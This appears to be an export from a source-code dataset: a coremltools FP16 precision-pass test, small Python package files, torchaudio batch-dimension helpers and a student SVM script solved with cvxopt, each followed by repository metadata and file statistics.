|-----> cast(dtype="fp32") ---> output_1
input -----> cast(dtype="fp16") -----> split
|-----> cast(dtype="fp32") ---> output_2
"""
def test_multiple_outputs_from_single_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
x = mb.split(x=x, axis=0, num_splits=2)
return x
self.assertEqual(get_op_types_in_program(prog), ['split'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "split", "cast", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 1)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "split")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp32")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 0)
# Asserting third cast configuration
cast_3 = block.find_ops(op_type="cast")[2]
self.assertEqual(cast_3.dtype.val, "fp32")
self.assertEqual(len(cast_3.outputs), 1)
self.assertEqual(len(cast_3.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20)},
expected_output_shapes={block.outputs[0].name: (5, 20), block.outputs[1].name: (5, 20)},
)
"""
Input graph:
|----> square ---> output_1
input|
|----> relu ---> output_2
Output graph:
|---->square-----> cast(dtype="fp32") ---> output_1
input -----> cast(dtype="fp16")
|----> relu -----> cast(dtype="fp32") ---> output_2
"""
def test_single_input_to_multiple_operations(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
y = mb.square(x=x)
z = mb.relu(x=x)
return y,z
self.assertEqual(get_op_types_in_program(prog), ['square', 'relu'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "square", "cast", "relu", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 2)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "square")
self.assertEqual(cast_1.outputs[0].child_ops[1].op_type, "relu")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp32")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 0)
# Asserting third cast configuration
cast_3 = block.find_ops(op_type="cast")[2]
self.assertEqual(cast_3.dtype.val, "fp32")
self.assertEqual(len(cast_3.outputs), 1)
self.assertEqual(len(cast_3.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20)},
expected_output_shapes={block.outputs[0].name: (10, 20), block.outputs[1].name: (10, 20)},
)
| 36.703125 | 102 | 0.58759 | 1,181 | 9,396 | 4.447079 | 0.133785 | 0.134235 | 0.0754 | 0.092155 | 0.775514 | 0.735529 | 0.724486 | 0.71211 | 0.701447 | 0.657083 | 0 | 0.039498 | 0.261707 | 9,396 | 255 | 103 | 36.847059 | 0.717601 | 0.063538 | 0 | 0.548148 | 0 | 0 | 0.052167 | 0.016267 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.074074 | false | 0.081481 | 0.051852 | 0 | 0.17037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
addd109cfd3d9c052a9e6651f12f83d818ec699d | 165 | py | Python | sales_register/adapters/repositories/postgres/__init__.py | tamercuba/purchase-system | cfd3e4fecbd96c130f620d11491fa14979c0d996 | ["MIT"] | null | null | null | sales_register/adapters/repositories/postgres/__init__.py | tamercuba/purchase-system | cfd3e4fecbd96c130f620d11491fa14979c0d996 | ["MIT"] | 6 | 2021-05-15T21:44:19.000Z | 2021-05-23T22:20:13.000Z | sales_register/adapters/repositories/postgres/__init__.py | tamercuba/sales-register | cfd3e4fecbd96c130f620d11491fa14979c0d996 | ["MIT"] | null | null | null |
from adapters.repositories.postgres.sale_repository import SaleRepository
from adapters.repositories.postgres.salesman_repository import (
SalesmanRepository,
)
| 33 | 73 | 0.860606 | 16 | 165 | 8.75 | 0.625 | 0.171429 | 0.342857 | 0.457143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084848 | 165 | 4 | 74 | 41.25 | 0.927152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
70e03b8e077b4af97d5b3b2a8055bc037be043a0 | 49 | py | Python | ner/dtime/__init__.py | aaashuai/easy_wechat_reminder | 2d8c032b2fcebf18a54d4aa7cb58db31fd333c35 | ["Apache-2.0"] | 1 | 2021-11-06T14:06:03.000Z | 2021-11-06T14:06:03.000Z | ner/dtime/__init__.py | aaashuai/easy_wechat_reminder | 2d8c032b2fcebf18a54d4aa7cb58db31fd333c35 | ["Apache-2.0"] | 15 | 2021-06-20T08:35:25.000Z | 2021-12-31T06:54:20.000Z | ner/dtime/__init__.py | aaashuai/easy_wechat_reminder | 2d8c032b2fcebf18a54d4aa7cb58db31fd333c35 | ["Apache-2.0"] | null | null | null |
from ner.dtime.dtime import ZHDatetimeExtractor
| 16.333333 | 47 | 0.857143 | 6 | 49 | 7 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 49 | 2 | 48 | 24.5 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cb44d2d99791f9c71c50438eeecfd99c8588ac4f | 557 | py | Python | Desafios/des031.py | joseangelooliveira-br/Python3 | c0ba39768706f84f26b0616b75dd8c7971145b0e | ["MIT"] | null | null | null | Desafios/des031.py | joseangelooliveira-br/Python3 | c0ba39768706f84f26b0616b75dd8c7971145b0e | ["MIT"] | null | null | null | Desafios/des031.py | joseangelooliveira-br/Python3 | c0ba39768706f84f26b0616b75dd8c7971145b0e | ["MIT"] | null | null | null |
'''
km = int(input('Enter the distance of your trip in kilometers: '))
if km <= 200:
    print('You will pay R$ {} for your ticket.'.format(km*.50))
else:
    print('You will pay R$ {} for your ticket.'.format(km * .45))
    print('You are about to start a trip of {} km.'.format(km))
'''
km = int(input('Enter the distance of your trip in kilometers: '))
print('You are about to start a trip of {} km.'.format(km))
if km <= 200:
    preco = km * .50
else:
    preco = km * .45
print('You will pay R$ {} for your ticket.'.format(preco))
| 30.944444 | 68 | 0.644524 | 89 | 557 | 4.033708 | 0.337079 | 0.089136 | 0.125348 | 0.133705 | 0.86351 | 0.86351 | 0.86351 | 0.86351 | 0.763231 | 0.551532 | 0 | 0.030973 | 0.18851 | 557 | 17 | 69 | 32.764706 | 0.763274 | 0.517056 | 0 | 0 | 0 | 0 | 0.505747 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
cb544aeef2a1ab4ccb43f250c0f8c53b3d739f0b | 57 | py | Python | config/watdafudge_c/client/__init__.py | happyfaults/pywatdafudge | cbbc05bf75f3d9fce115d6e117aedb0dbaa68a76 | ["MIT"] | null | null | null | config/watdafudge_c/client/__init__.py | happyfaults/pywatdafudge | cbbc05bf75f3d9fce115d6e117aedb0dbaa68a76 | ["MIT"] | null | null | null | config/watdafudge_c/client/__init__.py | happyfaults/pywatdafudge | cbbc05bf75f3d9fce115d6e117aedb0dbaa68a76 | ["MIT"] | null | null | null |
from .. import Config
class Interactor(Config):
pass
| 14.25 | 25 | 0.719298 | 7 | 57 | 5.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192982 | 57 | 4 | 26 | 14.25 | 0.891304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
cb709c36e42f6be57e8bc365e7235f11b7458a4d | 63 | py | Python | rpi_monitor/__init__.py | WildflowerSchools/wf-rpi-monitor | e73e9979aec75f48ede2ca237f6e2a5568175384 | ["MIT"] | 1 | 2022-02-03T17:28:23.000Z | 2022-02-03T17:28:23.000Z | rpi_monitor/__init__.py | WildflowerSchools/wf-rpi-monitor | e73e9979aec75f48ede2ca237f6e2a5568175384 | ["MIT"] | null | null | null | rpi_monitor/__init__.py | WildflowerSchools/wf-rpi-monitor | e73e9979aec75f48ede2ca237f6e2a5568175384 | ["MIT"] | null | null | null |
from rpi_monitor.core import *
from rpi_monitor.tests import *
| 21 | 31 | 0.809524 | 10 | 63 | 4.9 | 0.6 | 0.285714 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 63 | 2 | 32 | 31.5 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
38023b54af566671041e7087cc93af11c5a9d952 | 372 | py | Python | torchaudio_augmentations/utils.py | wesbz/torchaudio-augmentations | e7b379be60376bb4a44f72a6840358871b3ff06d | ["MIT"] | 112 | 2021-05-23T20:35:53.000Z | 2022-03-29T09:04:54.000Z | torchaudio_augmentations/utils.py | wesbz/torchaudio-augmentations | e7b379be60376bb4a44f72a6840358871b3ff06d | ["MIT"] | 6 | 2021-06-29T18:36:02.000Z | 2021-11-15T17:55:44.000Z | torchaudio_augmentations/utils.py | wesbz/torchaudio-augmentations | e7b379be60376bb4a44f72a6840358871b3ff06d | ["MIT"] | 14 | 2021-06-03T06:32:27.000Z | 2022-02-17T02:31:16.000Z |
import torch
def tensor_has_valid_audio_batch_dimension(tensor: torch.Tensor) -> bool:
    # A batched audio tensor is expected to be 3-D: (batch, channels, samples).
    return tensor.ndim == 3
def add_audio_batch_dimension(tensor: torch.Tensor) -> torch.Tensor:
return tensor.unsqueeze(dim=0)
def remove_audio_batch_dimension(tensor: torch.Tensor) -> torch.Tensor:
return tensor.squeeze(dim=0)
| 23.25 | 81 | 0.744624 | 52 | 372 | 5.115385 | 0.403846 | 0.24812 | 0.383459 | 0.281955 | 0.620301 | 0.620301 | 0.620301 | 0.620301 | 0.443609 | 0.443609 | 0 | 0.009585 | 0.158602 | 372 | 15 | 82 | 24.8 | 0.840256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.111111 | 0.222222 | 0.888889 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
382eab0b90c3928b875bfb3f47a9efe08986b240 | 20,976 | py | Python | CVX.py | saransh738/ELL409-SVM-CLASSIFIER-FROM-SCRATCH | 16dc8c2f57f23cdea712fbce127d7b18f779754a | ["Apache-2.0"] | null | null | null | CVX.py | saransh738/ELL409-SVM-CLASSIFIER-FROM-SCRATCH | 16dc8c2f57f23cdea712fbce127d7b18f779754a | ["Apache-2.0"] | null | null | null | CVX.py | saransh738/ELL409-SVM-CLASSIFIER-FROM-SCRATCH | 16dc8c2f57f23cdea712fbce127d7b18f779754a | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from libsvm.svmutil import *
from sklearn import svm
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
import cvxopt
from timeit import default_timer as timer
#Reading files
data_points = pd.read_csv('2019MT60763.csv', header = None, nrows = 3000)
data = np.array((data_points.sort_values(data_points.columns[25])).values)
dp = np.array(data)
class_label = dp[:,25]
# counting no of occurence of labels of each class
unique, counts = np.unique(class_label, return_counts=True)
dict(zip(unique, counts))
#print(counts)
# for 25 features
# FOR CLASSES {0,1}
text_x = dp[:631,:25]
text_t = dp[:631,25].astype('int')
for i in range(text_t.shape[0]):
if (text_t[i] == 0) :
text_t[i] = 1
else :
text_t[i] = -1
#testing data
tp_x_1 = np.append(dp[:100,:25],dp[306:406,:25],axis=0)
tp_t_1 = np.append(dp[:100,25],dp[306:406,25],axis=0)
tp_t_1 = tp_t_1.astype('int')
for i in range(tp_t_1.shape[0]):
if (tp_t_1[i] == 0) :
tp_t_1[i] = 1
else :
tp_t_1[i] = -1
tp_x_2 = np.append(dp[101:201,:25],dp[407:507,:25],axis=0)
tp_t_2 = np.append(dp[101:201,25],dp[407:507,25],axis=0)
tp_t_2 = tp_t_2.astype('int')
for i in range(tp_t_2.shape[0]):
if (tp_t_2[i] == 0) :
tp_t_2[i] = 1
else :
tp_t_2[i] = -1
tp_x_3 = np.append(dp[202:305,:25],dp[508:631,:25],axis=0)
tp_t_3 = np.append(dp[202:305,25],dp[508:631,25],axis=0)
tp_t_3 = tp_t_3.astype('int')
for i in range(tp_t_3.shape[0]):
if (tp_t_3[i] == 0) :
tp_t_3[i] = 1
else :
tp_t_3[i] = -1
#function to compute kernel function
def compute_K(kernel,X,gamma,degree):
K = X.dot(np.transpose(X))
if(kernel == 'poly'):
K = (gamma*K+1)**degree
elif(kernel == 'rbf'):
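        # 2*xi.xj - ||xi||^2 - ||xj||^2 = -||xi - xj||^2, so exp(gamma*K) below is the RBF kernel exp(-gamma*d^2).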
u = np.diag(X.dot(np.transpose(X))).reshape((-1, 1))*np.ones((1, X.shape[0]))
K = 2*K-u- np.diag(X.dot(np.transpose(X))).reshape((1, -1))*np.ones((X.shape[0], 1))
K = np.exp(gamma*K)
elif(kernel == 'sigmoid'):
K = np.tanh(gamma*K+1)
return K
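# cvx_fiting solves the soft-margin SVM dual in alpha: minimize (1/2) a^T H a - 1^T a
# subject to 0 <= a_i <= C and y^T a = 0, where H = (y y^T) * K elementwise.
# Note that cvxopt.solvers.qp(P, q, G, h, A, b) takes the quadratic term first, so the
# locally named `p` (= H) is passed as P and `Q` (the vector of -1s) as q.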
def cvx_fiting(C,X,y,K):
n = X.shape[0]
y = y.reshape((-1,1)) * 1.0
H = ((y.dot(np.transpose(y)))*K)
Q = cvxopt.matrix(-np.ones((n,1)))
p = cvxopt.matrix(H)
G = cvxopt.matrix(np.concatenate((-np.eye(n), np.eye(n))))
h = cvxopt.matrix(np.append(np.zeros((n,1)),(np.ones((n,1)))*C))
A = cvxopt.matrix(np.transpose(y))
b = cvxopt.matrix(0.0)
cvxopt.solvers.options['show_progress'] = False
sol=cvxopt.solvers.qp(p,Q,G,h,A,b)
multipliers = np.array(sol['x'])
return multipliers
def get_scores(X,y,w,b):
p = np.dot(X,w.T)+b
m = y.shape[0]
score = 0
for j in range(m):
if (p[j] >= 0):
p[j] = 1
else :
p[j] = -1
for i in range(m):
if (p[i]*y[i]) > 0 :
score=score+1
return score/m
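# weights recovers the primal weight vector for a linear kernel: w = sum_i alpha_i * y_i * x_i.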
def weights(alpha,X,y):
m,n = X.shape
w = np.zeros(n)
for i in range(X.shape[0]):
w += alpha[i]*y[i]*X[i,:]
return w
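# Support vectors are the training points whose dual multiplier exceeds a small threshold (1e-4 here).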
support_vectors = np.where(cvx_fiting(1.0,text_x,(text_t),compute_K('linear',text_x,0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.29,text_x,(text_t),compute_K('rbf',text_x,1.0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.0,text_x,(text_t),compute_K('poly',text_x,1.0,1)) > 1e-4)[0]
print(support_vectors)
start = timer()
w = weights((cvx_fiting(1.0,text_x,text_t,compute_K('linear',text_x,0,0))),text_x,text_t)
b = text_t[((cvx_fiting(1.0,text_x,text_t,compute_K('linear',text_x,0,0))) > 1e-4).reshape(-1)] - np.dot(text_x[((cvx_fiting(1.0,text_x,text_t,compute_K('linear',text_x,0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x,text_t,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)], w1)
p1 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p1+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)], w2)
p1+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p1+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)], w3)
p1+= get_scores(tp_x_1,tp_t_1,w,b[0])
p1+= get_scores(tp_x_3,tp_t_3,w,b[0])
print('Cross_validation score',p1/6)
end = timer()
print('Time',end - start)
w = weights((cvx_fiting(1.29,text_x,text_t,compute_K('rbf',text_x,1.0,0))),text_x,text_t)
b = text_t[((cvx_fiting(1.29,text_x,text_t,compute_K('rbf',text_x,1.0,0))) > 1e-4).reshape(-1)] - np.dot(text_x[((cvx_fiting(1.29,text_x,text_t,compute_K('rbf',text_x,1.0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x,text_t,w,b[0]))
w1 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)], w1)
p8 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p8+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)], w2)
p8+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p8+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)], w3)
p8+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p8+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p8/6)
start1 = timer()
w = weights((cvx_fiting(1.0,text_x,text_t,compute_K('poly',text_x,1.0,1))),text_x,text_t)
b= text_t[((cvx_fiting(1.0,text_x,text_t,compute_K('poly',text_x,1.0,1))) > 1e-4).reshape(-1)] - np.dot(text_x[((cvx_fiting(1.0,text_x,text_t,compute_K('poly',text_x,1.0,1))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x,text_t,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,1))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,1))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,1))) > 1e-4).reshape(-1)], w1)
p4 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p4+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,1))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,1))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,1))) > 1e-4).reshape(-1)], w2)
p4+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p4+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,1))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,1))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,1))) > 1e-4).reshape(-1)], w3)
p4+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p4+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p4/6)
end1 = timer()
print('TIME',end1 - start1)
# In[2]:
# FOR CLASSES {2,3}
#training data
text_x_2 = (dp[632:1230,:25])
text_t_2 = (dp[632:1230,25]).astype('int')
for i in range(text_t_2.shape[0]):
if (text_t_2[i] == 2) :
text_t_2[i] = 1
else :
text_t_2[i] = -1
#testing data
tp_x_1 = np.append(dp[632:732,:25],dp[943:1043,:25],axis=0)
tp_t_1 = np.append(dp[632:732,25],dp[943:1043,25],axis=0)
tp_t_1 = tp_t_1.astype('int')
for i in range(tp_t_1.shape[0]):
if (tp_t_1[i] == 2) :
tp_t_1[i] = 1
else :
tp_t_1[i] = -1
tp_x_2 = np.append(dp[732:832,:25],dp[1043:1143,:25],axis=0)
tp_t_2 = np.append(dp[732:832,25],dp[1043:1143,25],axis=0)
tp_t_2 = tp_t_2.astype('int')
for i in range(tp_t_2.shape[0]):
if (tp_t_2[i] == 2) :
tp_t_2[i] = 1
else :
tp_t_2[i] = -1
tp_x_3 = np.append(dp[832:942,:25],dp[1143:1230,:25],axis=0)
tp_t_3 = np.append(dp[832:942,25],dp[1143:1230,25],axis=0)
tp_t_3 = tp_t_3.astype('int')
for i in range(tp_t_3.shape[0]):
if (tp_t_3[i] == 2) :
tp_t_3[i] = 1
else :
tp_t_3[i] = -1
support_vectors = np.where(cvx_fiting(7.74,text_x_2,(text_t_2),compute_K('linear',text_x_2,0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.29,text_x_2,(text_t_2),compute_K('rbf',text_x_2,1.0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.0,text_x_2,(text_t_2),compute_K('poly',text_x_2,1.0,5)) > 1e-9)[0]
print(support_vectors)
start3 = timer()
w = weights((cvx_fiting(7.74,text_x_2,text_t_2,compute_K('linear',text_x_2,0,0))),text_x_2,text_t_2)
b = text_t_2[((cvx_fiting(7.74,text_x_2,text_t_2,compute_K('linear',text_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_2[((cvx_fiting(7.74,text_x_2,text_t_2,compute_K('linear',text_x_2,0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x_2,text_t_2,w,b[0]))
w1 = weights((cvx_fiting(7.74,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(7.74,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(7.74,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)], w1)
p2 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p2+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(7.74,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(7.74,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(7.74,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)], w2)
p2+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p2+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(7.74,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(7.74,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(7.74,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)], w3)
p2+= get_scores(tp_x_1,tp_t_1,w,b[0])
p2+= get_scores(tp_x_3,tp_t_3,w,b[0])
print('Cross_validation score',p2/6)
end3 = timer()
print('TIME',end3 - start3)
w = weights((cvx_fiting(1.29,text_x_2,text_t_2,compute_K('rbf',text_x_2,1.0,0))),text_x_2,text_t_2)
b = text_t_2[((cvx_fiting(1.29,text_x_2,text_t_2,compute_K('rbf',text_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_2[((cvx_fiting(1.29,text_x_2,text_t_2,compute_K('rbf',text_x_2,1.0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x_2,text_t_2,w,b[0]))
w1 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)], w1)
p7 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p7+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
